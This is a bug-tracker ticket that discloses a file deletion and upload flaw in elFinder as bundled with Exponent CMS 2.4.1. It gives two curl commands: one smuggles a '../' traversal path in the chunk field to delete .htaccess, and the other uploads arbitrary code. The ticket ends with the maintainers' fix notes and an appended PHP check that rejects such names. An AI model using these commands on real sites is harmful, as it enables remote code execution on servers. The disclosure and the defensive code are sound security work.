
Exponent CMS 2.4.1 - Unrestricted File Deletion / Upload Vulnerability in elFinder
Reported by mm | January 10th, 2017 @ 04:52 PM | in 2.4.2 (closed)
Allows deleting arbitrary files and thus bypassing .htaccess restrictions on uploadable executable PHP files due to a flaw in external/elFinder/php/elFinder.class.php
Example:
curl "[exponent]/framework/modules/file/connector/elfinder.php" -F "cmd=upload" -F "target=l1_" -F "upload[]=" -F chunk="../[exponent]/files/.htaccess"
curl "[exponent]/framework/modules/file/connector/elfinder.php" -F "cmd=upload" -F "target=l1_" -F "upload[]=@[remote code]"
Comments and changes to this ticket
-
dleffler January 11th, 2017 @ 07:58 PM
- State changed from new to open
- Tag set to security
- Assigned user changed from expNinja to dleffler
- Milestone set to 2.4.2
Issue has been addressed in 3rd party library and will be applied to exponent as soon as feasible: https://github.com/Studio-42/elFinder/issues/1843
-
dleffler January 14th, 2017 @ 03:05 AM
- State changed from open to resolved
Fixed by recent push to update elFinder to v2.1.20
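
For installs that cannot take the elFinder update right away, a connector-side check on the `chunk` field from the report can refuse names that leave the temporary directory. This is an added example, not code from elFinder or Exponent and not the upstream fix; the function name `safe_chunk_path` and the policy of rejecting dotfiles are assumptions made for illustration.

```php
<?php
// Added illustration, not elFinder or Exponent code. safe_chunk_path is a hypothetical name.

/**
 * Resolve a client-supplied chunk name to a path directly inside $tmpDir,
 * or return null if the name could reach anything outside it.
 */
function safe_chunk_path(string $tmpDir, string $chunkName): ?string
{
    // Reject empty names, NUL bytes and any directory separator outright.
    if ($chunkName === '' || strpbrk($chunkName, "/\\\0") !== false) {
        return null;
    }
    // Reject "." and ".." as well as dotfiles such as .htaccess (assumed policy).
    if ($chunkName[0] === '.') {
        return null;
    }
    $base = realpath($tmpDir);
    if ($base === false || !is_dir($base)) {
        return null;
    }
    $candidate = $base . DIRECTORY_SEPARATOR . $chunkName;
    // An existing entry must resolve to a file directly inside the directory,
    // which also rejects symlinks that point elsewhere or dangle.
    if (file_exists($candidate) || is_link($candidate)) {
        $real = realpath($candidate);
        if ($real === false || dirname($real) !== $base) {
            return null;
        }
    }
    return $candidate;
}

// Constructed inputs; the first is the chunk value quoted in the report above.
$tmp = sys_get_temp_dir();
$samples = [
    '../[exponent]/files/.htaccess',
    '.htaccess',
    'photo.jpg.0_3.part',
];
foreach ($samples as $name) {
    $path = safe_chunk_path($tmp, $name);
    printf("%-32s => %s\n", $name, $path === null ? 'rejected' : 'accepted');
}
```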